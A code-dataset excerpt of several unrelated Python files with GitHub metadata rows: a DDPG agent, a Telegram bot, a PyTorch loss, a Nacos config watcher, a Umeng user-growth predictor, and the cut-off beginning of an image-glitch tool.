self.value_optimizer = optim.Adam(self.online_value_model.parameters(), lr=value_info["learning_rate"])
self.value_max_grad_norm = value_info["max_grad_norm"]
# TRAINING AND EVALUATION STRATEGY
self.training_strategy = NormalNoiseStrategy(env_info["bounds"], training_info["exploration_noise_ratio"])
self.update_target_every_steps = training_info["update_every_step"]
self.evaluation_strategy = GreedyStrategy(env_info["bounds"])
self.n_warmup_batches = training_info["n_warmup_batches"]
self.soft_weight_tau = training_info.get("weight_mix_ratio", None)
# MEMORY INITIALIZATION
self.replay_buffer = Memory(capacity=buffer_info["size"], seed=training_info["seed"])
self.batch_size = buffer_info["batch_size"]
# seed
torch.manual_seed(training_info["seed"]);
self.rand_generator = np.random.RandomState(training_info["seed"])
# lower and upper action value bounds
self.low_bounds, self.high_bounds = env_info["bounds"]
def prepopulate(self, brain_name, env):
"""
First thing called after environment has been setup
To aviod the empty memory problem we randomly pre populate the memory. This is done
by taking random actions and storing them as experiences
Args:
brain_name: (string) name of agent we are using
env: (object) Environment we are operating in
"""
# flag for when to reset the environment [when we hit a terminal state]
reset_check, last_state = False, None
for idx in range(self.replay_buffer.tree.capacity):
# if idx is the first step get state or we have to reset
if idx == 0 or reset_check:
# change reset check back to false
reset_check = False
# resent environment and extract current state
env_info = env.reset(train_mode=True)[brain_name]
last_state = env_info.vector_observations[0]
# take random actions within acceptable bounds
action = self.rand_generator.uniform(low=self.low_bounds,
high=self.high_bounds,
size=len(self.high_bounds))
# take the action, recod reward, and terminal status
env_info = env.step(action)[brain_name]
reward = env_info.rewards[0]
done = env_info.local_done[0]
# checking status
if done:
# set reset flag
reset_check = True
state = np.zeros(last_state.shape)
# store in replay
self.replay_buffer.store(last_state, action, reward, state, done)
else:
# get next state from the environment
state = env_info.vector_observations[0]
# store in replay
self.replay_buffer.store(last_state, action, reward, state, done)
# update state
last_state = state
def update_networks(self, tau=0.1):
tau = self.soft_weight_tau if self.soft_weight_tau is not None else tau
# copy value model
for target, online in zip(self.target_value_model.parameters(),
self.online_value_model.parameters()):
target_ratio = (1.0 - tau) * target.data
online_ratio = tau * online.data
mixed_weights = target_ratio + online_ratio
target.data.copy_(mixed_weights)
# copy policy model
for target, online in zip(self.target_policy_model.parameters(),
self.online_policy_model.parameters()):
target_ratio = (1.0 - tau) * target.data
online_ratio = tau * online.data
mixed_weights = target_ratio + online_ratio
target.data.copy_(mixed_weights)
def load(self, states, actions, rewards, next_states, is_terminals):
# convert to torch tensors
states = torch.from_numpy(states).float().to(self.device)
actions = torch.from_numpy(actions).float().to(self.device)
next_states = torch.from_numpy(next_states).float().to(self.device)
rewards = torch.from_numpy(rewards).float().to(self.device)
is_terminals = torch.from_numpy(is_terminals).float().to(self.device)
# returns tensors
return states, actions, rewards, next_states, is_terminals
def optimize_model(self):
# priotized replay used so we can update optimize on the go: we get the batch indexes, memory,
# importance sampling
idx_batch, memory_batch, ISweights = self.replay_buffer.sample_per(self.batch_size)
# convert sampling weights to tensor
ISweights = torch.from_numpy(ISweights).float().to(self.device)
# unwrap
states, actions, rewards, next_states, is_terminals = self.replay_buffer.unwrap_experiences(memory_batch)
# convert to torch
states, actions, rewards, next_states, is_terminals = self.load(states, actions, rewards, next_states, is_terminals)
## Target policy
# get maximum policy over all states
argmax_a_q_sp = self.target_policy_model(next_states)
# calculate the q values corresponding to the policy above
max_a_q_sp = self.target_value_model(next_states, argmax_a_q_sp)
# calculate the TD target q_state action values
target_q_sa = rewards + self.gamma * max_a_q_sp * (1 - is_terminals)
## Online value
# for each state action pair we calculate the q_values
q_sa = self.online_value_model(states, actions)
## Loss calculations
td_error_loss = q_sa - target_q_sa.detach()
# calculate absolute error: convert to numpy
abs_error = torch.abs(td_error_loss).cpu().detach().numpy()
# update PER
self.replay_buffer.batch_update(idx_batch, abs_error.squeeze())
# calculate value loss using weight mean square error
value_loss = (ISweights * td_error_loss).mul(0.5).pow(2).mean()
# zero optimizer, do a backward pass, clip gradients, and finally optimizer
self.value_optimizer.zero_grad()
value_loss.backward()
torch.nn.utils.clip_grad_norm_(self.online_value_model.parameters(),
self.value_max_grad_norm)
self.value_optimizer.step()
## ONLINE POLICY
argmax_a_q_s = self.online_policy_model(states)
max_a_q_s = self.online_value_model(states, argmax_a_q_s)
## calculate loss using weighted mean
policy_loss = -(ISweights * max_a_q_s).mean()
self.policy_optimizer.zero_grad()
policy_loss.backward()
torch.nn.utils.clip_grad_norm_(self.online_policy_model.parameters(),
self.policy_max_grad_norm)
self.policy_optimizer.step()
def interaction_step(self, last_state, env, brain_name):
# initially we randomly explore the sample space
check = self.replay_buffer.current_storage_size < self.n_warmup_batches * self.batch_size
action = self.training_strategy.select_action(self.online_policy_model, last_state, check)
# get environment values
env_info = env.step(action)[brain_name]
state = env_info.vector_observations[0]
reward = env_info.rewards[0]
done = env_info.local_done[0]
# store into replay buffer
self.replay_buffer.store(last_state, action, reward, state, done)
# update tracking parameters
self.episode_reward[-1] += reward
self.episode_timestep[-1] += 1
self.episode_exploration[-1] += self.training_strategy.ratio_noise_injected
# return values
return state, done
def train(self, env, brain_name, gamma, max_minutes, max_episodes, goal_mean_100_reward):
# initialize tracking parameters
self.episode_timestep = []
self.episode_reward = []
self.episode_seconds = []
self.evaluation_scores = []
self.episode_exploration = []
self.gamma = gamma
# loop parameters
total_steps = 0
training_time = 0
training_start, last_debug_time = time.time(), float("-inf")
# storage for results
results = np.empty((max_episodes, 5))
results[:] = np.nan
# start training loop
for episode in range(1, max_episodes + 1):
# episode start tick
episode_start = time.time()
# refresh environment
state = env.reset(train_mode=True)[brain_name].vector_observations[0]
is_terminal = False
self.episode_reward.append(0.0)
self.episode_timestep.append(0.0)
self.episode_exploration.append(0.0)
for step in count():
state, is_terminal = self.interaction_step(state, env, brain_name)
# after making random steps
check = self.replay_buffer.current_storage_size > (self.n_warmup_batches * self.batch_size)
if check:
# run optimization
self.optimize_model()
# updates every episode
if np.sum(self.episode_timestep) % self.update_target_every_steps == 0:
self.update_networks()
if is_terminal:
gc.collect()
break
# stat tracking
episode_elapsed = time.time() - episode_start
self.episode_seconds.append(episode_elapsed)
training_time += episode_elapsed
evaluation_score, _ = self.evaluate(self.online_policy_model, env, brain_name)
self.save_checkpoint(episode - 1, self.online_policy_model)
total_steps = int(np.sum(self.episode_timestep))
self.evaluation_scores.append(evaluation_score)
# mean and std calculations
mean_10_reward = np.mean(self.episode_reward[-10:])
std_10_reward = np.std(self.episode_reward[-10:])
mean_100_reward = np.mean(self.episode_reward[-100:])
std_100_reward = np.std(self.episode_reward[-100:])
mean_100_eval_score = np.mean(self.evaluation_scores[-100:])
std_100_eval_score = np.std(self.evaluation_scores[-100:])
lst_100_exp_rat = np.array(self.episode_exploration[-100:]) / np.array(self.episode_timestep[-100:])
mean_100_exp_rat = np.mean(lst_100_exp_rat)
std_100_exp_rat = np.std(lst_100_exp_rat)
wallclock_elapsed = time.time() - training_start
results[episode - 1] = total_steps, mean_100_reward, mean_100_eval_score, \
training_time, wallclock_elapsed
reached_debug_time = time.time() - last_debug_time >= LEAVE_PRINT_EVERY_N_SECS
# termination criteria check
reached_max_minutes = wallclock_elapsed >= max_minutes * 60
reached_max_episodes = episode >= max_episodes
reached_goal_mean_reward = mean_100_eval_score >= goal_mean_100_reward
training_over = reached_max_minutes or reached_max_episodes or reached_goal_mean_reward
# message string
elapsed_str = time.strftime("%H:%M:%S", time.gmtime(time.time() - training_start))
debug_message = 'el {}, ep {:04}, ts {:07}, '
debug_message += 'ar_10 ts {:05.1f} \u00B1 {:05.1f}, '
debug_message += 'ar_100 ts {:05.1f} \u00B1 {:05.1f}, '
debug_message += 'ex 100 {:02.1f} \u00B1 {:02.1f}, '
debug_message += 'ev {:05.1f} \u00B1 {:05.1f}'
debug_message = debug_message.format(elapsed_str, episode - 1, total_steps,
mean_10_reward, std_10_reward,
mean_100_reward, std_100_reward,
mean_100_exp_rat, std_100_exp_rat,
mean_100_eval_score, std_100_eval_score)
print(debug_message, flush=True)
if reached_debug_time or training_over:
print("Debug Message")
print(debug_message, flush=True)
last_debug_time = time.time()
if training_over:
if reached_max_minutes: print(u'--> reached_max_minutes \u2715')
if reached_max_episodes: print(u'--> reached_max_episodes \u2715')
if reached_goal_mean_reward: print(u'--> reached_goal_mean_reward \u2713')
break
# get score for last round
final_eval_score, score_std = self.evaluate(self.online_policy_model, env, brain_name, n_episodes=100)
wallclock_time = time.time() - training_start
print("Training complete.")
print('Final evaluation score {:.2f}\u00B1{:.2f} in {:.2f}s training time,'
' {:.2f}s wall-clock time.\n'.format(
final_eval_score, score_std, training_time, wallclock_time))
# close and delete the environment
env.close() ; del env
self.get_cleaned_checkpoints()
return results, final_eval_score, training_time, wallclock_time
def evaluate(self, eval_policy_model, eval_env, brain_name, n_episodes=1):
rs = []
for _ in range(n_episodes):
env_info = eval_env.reset(train_mode=True)[brain_name]
state, done = env_info.vector_observations[0], False
rs.append(0)
for _ in count():
action = self.evaluation_strategy.select_action(eval_policy_model, state)
env_info = eval_env.step(action)[brain_name]
state = env_info.vector_observations[0]
reward = env_info.rewards[0]
done = env_info.local_done[0]
rs[-1] += reward
if done: break
# return mean and standard deviation
return np.mean(rs), np.std(rs)
def save_checkpoint(self, episode_idx, model):
torch.save(model.state_dict(),
os.path.join("results", "checkpoint_models", 'model.{}.tar'.format(episode_idx)))
def get_cleaned_checkpoints(self, n_checkpoints=4):
try:
return self.checkpoint_paths
except AttributeError:
self.checkpoint_paths = {}
paths = glob.glob(os.path.join("results", "checkpoint_models", '*.tar'))
paths_dic = {int(path.split('.')[-2]): path for path in paths}
last_ep = max(paths_dic.keys())
checkpoint_idxs = np.linspace(1, last_ep + 1, n_checkpoints, endpoint=True, dtype=np.int) - 1
for idx, path in paths_dic.items():
if idx in checkpoint_idxs:
self.checkpoint_paths[idx] = path
else:
os.unlink(path)
| Oreoluwa-Se/Continuous-Control | helpers/agent.py | agent.py | py | 16,852 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.path.join",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 15,
"usage_type": "attribute"
},
{
"api_name": "torch.device",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "torch.cuda.is_available",
... |
34341824103 | # -*- coding: utf-8 -*-
from telegram.ext import Updater
from telegram.ext import CommandHandler
from telegram.ext import MessageHandler, Filters
from telegram.ext.dispatcher import run_async
from telegram import ReplyKeyboardMarkup, ReplyKeyboardRemove, KeyboardButton
import telegram
from emoji import emojize, demojize
from commands import *
from commands.libs.decorators import commands, descriptions
from commands.libs.history import add_history
from commands.general import cmd_start
from settings import *
from tools.text import analyze_text
from tools.libs import *
from shared import save_data, clean_data
import random, logging, os, sys, atexit, threading
# Set up basic logging
logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO)
@atexit.register
def final_handler():
print("Stop")
# Gestion des taches planifié
# bot = telegram.Bot(token=token)
# def doAction():
# bot.sendMessage(chat_id="TODO", text="Test")
# threading.Timer(60, doAction).start()
# doAction()
@run_async
def start(bot, update, args):
# Sauvegarde de l’id du nouveau client.
attrs = make_attrs_from_telegram(update, bot, args, {})
cmd_start(attrs)
@run_async
def commands_handler(bot, update, args, no_fail_reply=False, attrs=None):
try:
if not attrs:
attrs = make_attrs_from_telegram(update, bot, args, {})
else:
bot = attrs["telegram"]["bot"]
update = attrs["telegram"]["update"]
args = attrs["telegram"]["args"]
commande = get_probable_command(update.message.text, bot.name)
# Si c’est en mode « Salon », alors l’historique est enregistré
# pour le salon sinon c’est pour le pseudo de l’utilisateur
if commande:
add_history(pseudo=username_or_channel(attrs), command="{0} {1}".format(commande, attrs["query"]))
else:
add_history(pseudo=username_or_channel(attrs), command=update.message.text)
if commande in commands:
if no_fail_reply == False:
# Si pas de réponse en cas d’erreur, on indique jamais que laurence écrit
bot.sendChatAction(chat_id=update.message.chat_id, action="typing")
# Execution de la commande en question
retour = commands[commande](attrs)
# Réponse
if retour != "" and retour is not None:
if type(retour) is not str:
retour = " ".join(retour)
retour = emojize(retour)
bot.sendMessage(chat_id=update.message.chat_id, text=retour, reply_markup=ReplyKeyboardRemove(),
parse_mode="Markdown")
# update.message.reply_text(retour, reply_markup=ReplyKeyboardRemove())
elif no_fail_reply == False:
# Cas d’erreur uniquement si on est dans le cas ou l’on doit pas répondre en cas d’erreur
update.message.reply_text(
"Désolé, je ne comprend pas encore votre demande… La liste des commandes est disponible via /aide",
reply_markup=ReplyKeyboardRemove())
except Exception as e:
print(e)
import traceback
traceback.print_exc()
@run_async
def text_handler(bot, update):
update.message.text = update.message.text.replace(bot.name, "").lstrip()
attrs = analyze_text(bot, update, do_google_search=is_private_channel(update))
commands_handler(None, None, None, True, attrs=attrs)
@run_async
def location_handler(bot, update):
args = update.message.text.split(' ')
update.message.text = "/proche"
commands_handler(bot, update, args[1:], no_fail_reply=True)
@run_async
def voice_handler(bot, update):
update.message.reply_text(
emojize("Très jolie voix ! Mais je ne comprend pas encore la parole :cry:.", use_aliases=True),
reply_markup=ReplyKeyboardRemove())
def unknown_handler(bot, update):
update.message.reply_text(
"Désolé, je ne comprend pas encore votre demande… La liste des commandes est disponible via /aide",
reply_markup=ReplyKeyboardRemove())
def register_slash_commands():
for command in commands:
dispatcher.add_handler(CommandHandler(command, commands_handler, pass_args=True))
def error(bot, update, error):
logging.warn('Update "%s" caused error "%s"' % (update, error))
if __name__ == '__main__':
token = os.getenv('LAURENCE_TOKEN')
if not token:
logging.critical('Token absent')
sys.exit()
updater = Updater(token=token)
dispatcher = updater.dispatcher
dispatcher.add_handler(CommandHandler('start', start, pass_args=True))
register_slash_commands()
# Gestion du text comme commande (Temporaire)
dispatcher.add_handler(MessageHandler(Filters.text, text_handler))
# Gestion des envois type « position »
dispatcher.add_handler(MessageHandler(Filters.location, location_handler))
# Gestion des envois type « Voice »
dispatcher.add_handler(MessageHandler(Filters.voice, voice_handler))
# log all errors
dispatcher.add_error_handler(error)
print("Laurence is ready.")
updater.start_polling()
| c4software/laurence-bot | telegram_start.py | telegram_start.py | py | 5,247 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "logging.basicConfig",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "logging.INFO",
"line_number": 24,
"usage_type": "attribute"
},
{
"api_name": "atexit.register",
"line_number": 27,
"usage_type": "attribute"
},
{
"api_name": "commands.g... |
31608746342 | import torch
from torch import nn
from torch.autograd import Variable
class topk_crossEntrophy(nn.Module):
def __init__(self, top_k=0.7):
super(topk_crossEntrophy, self).__init__()
self.loss = nn.NLLLoss()
self.top_k = top_k
self.softmax = nn.LogSoftmax()
return
def forward(self, input, target):
softmax_result = self.softmax(input)
loss = Variable(torch.Tensor(1).zero_()).cuda()
for idx, row in enumerate(softmax_result):
gt = target[idx]
pred = torch.unsqueeze(row, 0)
gt = torch.unsqueeze(gt, 0)
cost = self.loss(pred, gt)
loss = torch.cat((loss, cost.unsqueeze(0)), 0)
loss = loss[1:]
if self.top_k == 1:
valid_loss = loss
index = torch.topk(loss, int(self.top_k * loss.size()[0]))
valid_loss = loss[index[1]]
return torch.mean(valid_loss) | Forrest0503/VAT-ABAW | ohem_loss.py | ohem_loss.py | py | 987 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "torch.nn.Module",
"line_number": 5,
"usage_type": "attribute"
},
{
"api_name": "torch.nn",
"line_number": 5,
"usage_type": "name"
},
{
"api_name": "torch.nn.NLLLoss",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_numb... |
26281206663 | #!/usr/bin/env python3
# coding:utf-8
import os,hashlib
import shutil
import subprocess
from datetime import datetime
import nacos
import yaml
from apscheduler.schedulers.blocking import BlockingScheduler
from dotenv import load_dotenv, find_dotenv
# load .env file
load_dotenv(find_dotenv(), override=True)
SERVER_ADDRESSES = os.getenv("nacos_server")
NAMESPACE = os.getenv("nacos_namespace_id")
USERNAME = os.getenv("nacos_suth_user")
PASSWORD = os.getenv("nacos_auth_passwd")
# auth mode
client = nacos.NacosClient(SERVER_ADDRESSES, namespace=NAMESPACE, username=USERNAME, password=PASSWORD)
client.set_options(callback_thread_num=1)
class Watcher():
def __init__(self):
self.cf = cf
def run(self):
for p in self.cf['configs']:
self.cf_path = p['path']
self.watch(id=p['id'], group=p['group'])
def file_md5(self, file_path):
with open(file_path, 'rb') as file:
f = file.read()
m = hashlib.md5()
m.update(f)
return m.hexdigest()
def print_cm(self, status):
snapshot_file = "{0}+{1}+{2}".format(status['data_id'], status['group'], NAMESPACE)
for p in self.cf['configs']:
if status['data_id'] == p['id'] and status['group'] == p['group']:
if self.file_md5("nacos-data/snapshot/{}".format(snapshot_file)) != self.file_md5(p['path']):
shutil.copyfileobj(open("nacos-data/snapshot/{}".format(snapshot_file), "rb"), open(p['path'], "wb"))
s, r = subprocess.getstatusoutput(p['command'])
if int(s) != 0:
print("命令执行失败:{}".format(p['command']))
return True
def watch(self, id, group):
client.add_config_watcher(id, group, self.print_cm)
if __name__ == '__main__':
# 传入配置
with open('config.yaml', 'r+') as f:
cf = yaml.load(f)
# # 常驻调度任务
scheduler = BlockingScheduler()
job = Watcher()
# 每隔1分钟执行一次 job_func;
scheduler.add_job(job.run, 'interval', minutes=1)
try:
print("{0} nacos watch the process start".format(datetime.now().strftime('%Y-%m-%d %H:%M:%S')))
scheduler.start()
except (KeyboardInterrupt, SystemExit):
print("{0} nacos watch the process exit".format(datetime.now().strftime('%Y-%m-%d %H:%M:%S')))
scheduler.shutdown()
| GounGG/nacos-client-py | nacos-get-config.py | nacos-get-config.py | py | 2,424 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "dotenv.load_dotenv",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "dotenv.find_dotenv",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "os.getenv",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "os.getenv",
"line... |
42215123133 | import json
import os
import datetime
import scipy.optimize
import sklearn.metrics
import aop
import aop.api
class DailyIndexPrediction:
def __init__(self):
# read the config.json in the current directory
with open(os.path.dirname(__file__) + '/config.json', 'r') as file_obj:
self.config = json.load(file_obj)
# set gateway domain name
aop.set_default_server('gateway.open.umeng.com')
# set apiKey and apiSecurity
aop.set_default_appinfo(self.config['api_key'],
self.config['api_security'])
self.factor = 54
self.dnu = list()
self.retention = list()
self._set_dnu_data()
self._set_retention_data()
def _get_retention_rate(self):
"""support 7-days average retention at most"""
# setup the start and end date of the retention request
start_date = datetime.datetime.now().date() + datetime.timedelta(days=-37)
end_date = datetime.datetime.now().date()
# build request
req = aop.api.UmengUappGetRetentionsRequest()
# send api request
try:
resp = req.get_response(None,
appkey=self.config['app_key'],
startDate=str(start_date),
endDate=str(end_date),
periodType='daily'
)
except aop.ApiError as e:
print('Exception returned by API gateway:', e)
except aop.AopError as e:
print('Exception before client API gateway request:', e)
except Exception as e:
print('Other unknown exceptions:', e)
# print(resp)
# extract retention rate info
retentions = [info['retentionRate'] for info in resp['retentionInfo']]
retentions.reverse()
return retentions
def _build_coordinate(self, avg_days=3):
retentions = self._get_retention_rate()
# umeng retention days
x_labels = [1, 2, 3, 4, 5, 6, 7, 14, 30]
y_labels = list()
for x in x_labels:
tmp_lst = []
for day in range(x-1, avg_days+x-1):
tmp_lst.append(retentions[day][x_labels.index(x)])
y_labels.append(sum(tmp_lst)/len(tmp_lst))
return x_labels, y_labels
def _curve_fitting(self):
x_labels, y_labels = self._build_coordinate()
def func(x, a, b):
return a * (x ** b)
popt, pcov = scipy.optimize.curve_fit(func, x_labels, y_labels)
# y_pred = [func(x, popt[0], popt[1]) for x in x_labels]
# r2 = sklearn.metrics.r2_score(y_labels, y_pred)
# print('coefficient of determination:', r2)
coefficient = popt[0]
exponent = popt[1]
return coefficient, exponent
def _set_retention_data(self):
"""notice: day must be greater than 0,
Calculate the retention according to the formula.
"""
coefficient, exponent = self._curve_fitting()
self.retention = [coefficient * (day ** exponent) / 100 for day in range(1, 181)]
def _update_dnu(self):
"""update dnu"""
with open(os.path.dirname(__file__) + '/dnu.json', 'r') as file_obj:
dnu_data = json.load(file_obj)
today = datetime.datetime.now().date()
last_date = max(dnu_data.keys())
last_date = datetime.datetime.strptime(last_date, '%Y-%m-%d').date()
if (today - last_date).days == 1:
pass
else:
# update dnu
start_date = last_date + datetime.timedelta(days=1)
end_date = today - datetime.timedelta(days=1)
# send api request
req = aop.api.UmengUappGetNewAccountsRequest()
try:
resp = req.get_response(None,
appkey=self.config['app_key'],
startDate=str(start_date),
endDate=str(end_date)
)
except aop.ApiError as e:
print('Exception returned by API gateway:', e)
except aop.AopError as e:
print('Exception before client API gateway request:', e)
except Exception as e:
print('Other unknown exceptions:', e)
resp = resp['newAccountInfo']
for i in resp:
dnu_data[i['date']] = i['newUser']
with open(os.path.dirname(__file__) + '/dnu.json', 'w') as file_obj:
json.dump(dnu_data, file_obj, indent=8)
return dnu_data
def _set_dnu_data(self):
dnu_data = self._update_dnu()
dnu_lst = list()
today = datetime.datetime.now().date()
date_index = today
date_index -= datetime.timedelta(days=1)
for i in range(180):
dnu_lst.append(dnu_data[str(date_index)])
date_index -= datetime.timedelta(days=1)
self.dnu = dnu_lst
def test(self, days, goal):
self._set_dnu_data()
self._set_retention_data()
print(self.retention)
print(sum(self.retention[:6]))
# print(sum(self.retentions[:3]))
# print(sum([i[0]*i[1] for i in zip(self.retentions[24:self.factor], self.dnu[24:self.factor])]))
# r_sum = sum(self.retentions[:days-1]) + 1
# dnu_each_day = goal / r_sum
# print()
# print('GOAL: {} DAU in {} days.'.format(goal, days))
# print('You need on average {} new users everyday.'.format(round(dnu_each_day), days))
# print('The total number of new users in {} day[s] is {}.'.format(days, round(dnu_each_day)*days))
# print('The total customer acquisition cost of {} new users is ¥{}.'.format(round(dnu_each_day)*days, round(dnu_each_day)*days*0.65))
def dau_prediction(self, data_payload):
    """Predict the DAU reached on a target date for a given DNU plan.

    Two payload shapes are supported:
    {
        "is_avg_dnu": 1,
        "dnu_data": {
            "goal_each_day": 10000,
            "target_date": "2020-11-24"
        }
    }
    {
        "is_avg_dnu": 0,
        "dnu_data": {
            "2020-11-21": 5000,
            "2020-11-22": 6000,
            "2020-11-23": 7000,
            "2020-11-24": 8000
        }
    }
    Returns a human-readable summary string.
    """
    # average DNU mode: the same planned DNU for every remaining day
    if int(data_payload['is_avg_dnu']):
        # extract data
        dnu_each_day = int(data_payload['dnu_data']['goal_each_day'])
        target_date = data_payload['dnu_data']['target_date']
        # calc timedelta
        target_date = datetime.datetime.strptime(target_date, '%Y-%m-%d').date()
        current_date = datetime.datetime.now().date()
        timedelta = (target_date - current_date).days
        # BUGFIX: copy the cached list — the original aliased self.dnu, so the
        # slice-assignment below corrupted the cache on every call
        dnu_lst = list(self.dnu)
        dnu_lst[:0] = [dnu_each_day] * timedelta
        dnu_lst = dnu_lst[:self.factor]
        # set retention list
        retention_lst = self.retention[:self.factor]
        # calc ideal DAU: retained users from each cohort + today's new users
        ideal_dau = sum([x * y for x, y in zip(dnu_lst, retention_lst)]) + dnu_each_day
        ideal_dau = round(ideal_dau)
        return '{dnu} new users for today and future {timedelta} day(s), you will reach {dau} active users on {date}'.format(dnu=dnu_each_day, timedelta=timedelta, dau=ideal_dau, date=str(target_date))
    # custom DNU mode: an explicit DNU value per date
    else:
        # extract data
        dnu_data = data_payload['dnu_data']
        last_date = max(dnu_data.keys())
        # calc timedelta
        timedelta = len(dnu_data.keys()) - 1
        # BUGFIX: copy for the same aliasing reason as above
        dnu_lst = list(self.dnu)
        # NOTE(review): relies on dnu_data insertion order matching date order —
        # confirm against callers
        dnu_lst[:0] = reversed(list(dnu_data.values())[:timedelta])
        dnu_lst = dnu_lst[:self.factor]
        # set retention list
        retention_lst = self.retention[:self.factor]
        # calc ideal DAU: retained cohorts + the last planned day's new users
        ideal_dau = sum([x * y for x, y in zip(dnu_lst, retention_lst)]) + dnu_data[last_date]
        ideal_dau = round(ideal_dau)
        return 'You will reach {dau} active users on {date}'.format(dau=ideal_dau, date=last_date)
def dnu_prediction(self, dau_goal=0, end_date=None):
    """Compute how many daily new users are needed to hit a DAU goal.

    Expected payload shape:
    {
        "dau_goal": 20000,
        "target_date": "2020-11-24"
    }
    Returns a human-readable summary string.
    """
    today = datetime.datetime.now().date()
    target = datetime.datetime.strptime(end_date, '%Y-%m-%d').date()
    days_ahead = (target - today).days
    if days_ahead < 0:
        return 'Wrong Date.'
    if days_ahead == 0:
        # goal for today: subtract users retained from past cohorts
        carried = sum(d * r for d, r in zip(self.dnu, self.retention[:self.factor]))
        return 'You need to guarantee {} new users today.'.format(round(dau_goal - carried))
    # future goal: past cohorts contribute via retention shifted by days_ahead;
    # the constant cohorts from today to the target contribute the remainder
    carried = sum(d * r for d, r in zip(self.dnu, self.retention[days_ahead:self.factor]))
    needed = (dau_goal - carried) / (sum(self.retention[:days_ahead]) + 1)
    return 'You need to guarantee {} new users today and in the next {} day[s].'.format(round(needed), days_ahead)
# Algorithm notes:
# - should every run trigger a fresh API request?
# - TODO: auto-adapt the 45-day retention factor
if __name__ == '__main__':
    # Smoke test: refresh the cached data and print the retention summary.
    predict = DailyIndexPrediction()
    predict.test(1, 1)
    # Example of a payload-driven prediction:
    # with open('predict_dau_b.json', 'r') as file_obj:
    #     data = json.load(file_obj)
    #     print(predict.dau_prediction(data))
{
"api_name": "os.path.dirname",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 17,
"usage_type": "attribute"
},
{
"api_name": "json.load",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "aop.set_default_server",
"... |
74105530982 | #!/usr/bin/env python3
"""Gleitzsch core."""
import argparse
import sys
import os
import random
import string
import subprocess
from subprocess import DEVNULL
# from subprocess import PIPE
from array import array
import numpy as np
from skimage import io
from skimage import img_as_float
from skimage.util import img_as_ubyte
from skimage import transform as tf
from skimage import exposure
from skimage import util
from skimage import color
from skimage import filters
try:
from pydub import AudioSegment
except ImportError:
sys.stderr.write("Warning! Could not import pydub.\n")
sys.stderr.write("This library is not mandatory, however\n")
sys.stderr.write("filters on sound data would be not available\n")
AudioSegment = None
__author__ = "Bogdan Kirilenko, 2020"
__version__ = 4.0
# text constants: dictionary keys addressing individual filters / mp3 options
RB_SHIFT = "rb_shift"                    # chromatic-aberration filter
GLITTER = "glitter"                      # random white sparks
GAMMA_CORRECTION = "gamma_correction"
ADD_TEXT = "add_text"                    # text overlay (position may be random)
VERT_STREAKS = "vert_streaks"            # vertical streak distortion
ADD_NOISE = "add_noise"                  # speckle noise before mp3 compression
SOUND_QUALITY = "sound_quality"          # lame -q value, must be in [1..10]
BITRATE = "bitrate"                      # lame -b value (kbit/s)
INTENSIFY = "intensify"                  # boost the glitched/original diff
GLITCH_SOUND = "glitch_sound"            # edit the intermediate mp3 stream itself
ADD_RAINBOW = "add_rainbow"              # rainbow overlay on bright areas
SHIFT_SIZE = "shift_size"                # horizontal roll compensating mp3 shift
STRETCHING = "stretching"                # horizontal strip stretching
RANDOM = "random"                        # sentinel: random text position
TEMP = "temp"                            # name of the temp-files directory
MIN_IM_SIZE = 64                         # minimal allowed long-side size, px
class Gleitzsch:
    """Gleitzsch core class.

    Holds the working image as a float RGB array in self.im_arr; filter
    methods mutate it in place, and mp3_compression() round-trips every
    colour channel through the external `lame` encoder to produce the
    characteristic glitch effect.
    """

    def __init__(self, image_in, size=0, verbose=False):
        """Init gleitzsch class.

        image_in: path to an image file or a numpy array.
        size: target long-side size in px; 0 keeps the original size.
        verbose: when True, progress messages go to stderr.
        """
        # get image array
        self.verbose = verbose
        self.im_arr, _ = self.__read_im(image_in, size)
        self.lame_bin = "lame"
        self.__check_lame()  # check that lame is available
        # the order of this list also defines filter application order
        # (see apply_filters)
        self.supported_filters = [GLITTER, RB_SHIFT,
                                  VERT_STREAKS, ADD_TEXT,
                                  ADD_RAINBOW, STRETCHING]
        # create temp directory
        self.tmp_dir = os.path.join(os.path.dirname(__file__), TEMP)
        os.mkdir(self.tmp_dir) if not os.path.isdir(self.tmp_dir) else None
        self.temp_files = []  # collect temp files here (to delete later)
        self.gamma = 0.4  # gamma gain applied before the mp3 round-trip
        self.text_position = RANDOM
        self.v("Gleitzsch instance initiated successfully")

    def __read_im(self, image_in, size):
        """Read image, return an array and shape.

        Accepts a file path or a numpy array; monochrome input is expanded
        to 3 channels. Returns (float image array, (w, h)).
        """
        if isinstance(image_in, str) and os.path.isfile(image_in):
            self.v(f"Reading file {image_in}")
            matrix = img_as_float(io.imread(image_in))
        elif isinstance(image_in, np.ndarray):
            self.v("Reading np array")
            matrix = img_as_float(image_in)
        else:
            matrix = None
            self.__die(f"Cannot read:\n{image_in}")
        # image might be either 3D or 2D; if 2D -> make it 3D
        if len(matrix.shape) == 3:
            pass  # it's a 3D array already
        elif len(matrix.shape) == 2:
            # monochrome image; all procedures are 3D array-oriented
            layer = np.reshape(matrix, (matrix.shape[0], matrix.shape[1], 1))
            matrix = np.concatenate((layer, layer, layer), axis=2)
        else:  # something is wrong
            self.__die("Image is corrupted")
        # resize if this required
        if size == 0:
            # keep size as is (not recommended)
            im = matrix.copy()
            w, h, _ = im.shape
        elif size < MIN_IM_SIZE:  # what if size is negative?
            im, w, h = None, 0, 0
            # NOTE(review): missing f-prefix — "{size}" is printed literally
            self.__die("Image size (long side) must be > 64, got {size}")
        else:
            # resize the image
            scale_k = max(matrix.shape[0], matrix.shape[1]) / size
            h = int(matrix.shape[0] / scale_k)
            w = int(matrix.shape[1] / scale_k)
            im = tf.resize(image=matrix, output_shape=(h, w))
        self.v(f"Successfully read image; shape: {w}x{h}")
        return im, (w, h)

    def __check_lame(self):
        """Check that lame is installed; abort if `lame --version` fails."""
